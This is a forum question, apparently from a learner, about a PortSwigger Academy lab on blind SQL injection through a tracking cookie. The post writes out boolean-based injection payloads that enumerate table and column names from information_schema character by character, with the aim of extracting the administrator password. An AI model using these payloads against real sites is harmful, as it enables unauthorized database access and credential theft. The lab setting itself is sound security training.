Blind SQLi – guessing column name
I am learning Blind SQLi with the PortSwigger Academy but I am stuck on this lab: https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses.
In this lab I have to get the user 'administrator' password from the table 'users', columns 'username' and 'password', using blind SQLi located in a cookie. I can discover the table name 'users' and the column 'username', but I cannot discover the column 'password'.
My steps are as follows:
- Check if SQLi occurs in the cookie by modifying the cookie:
Cookie: TrackingId=abcdefghijk' AND '1'='1
and I get the response "Welcome back!". When the cookie is:
Cookie: TrackingId=abcdefghijk' AND '1'='2
there is no "Welcome back!" announcement. So there is SQLi.
- Check table name:
' AND (SELECT table_name FROM information_schema.tables LIMIT 1) > 'u
If true ('Welcome back!') I try the next letter a -> b -> c; if false I move to the next letter position ua -> ub -> uc and so on. I guessed that the table name users exists. I know that I can just try:
' AND (SELECT 'a' FROM users LIMIT 1) = 'a
but it's a pure guess.
- Now the hard part for me: check column name.
' AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'u
The same method as above, letter by letter, but there is something wrong because:
AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'use
returns true
AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'usz
returns false
AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'username
returns false
AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) = 'username
returns true
AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'password
returns true
AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) = 'password
returns false
AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'aaaaaaaaaaaaaaa
returns true
AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'z
returns false.
I do not understand this. If 'use' is true and 'usz' is false, why then is 'password' true? The letter 's' is higher than 'e', so it should be false. I cannot imagine the answer of this query. If the query's answer is 'username', how do you guess the second column 'password'? I tried to change LIMIT but that does not work.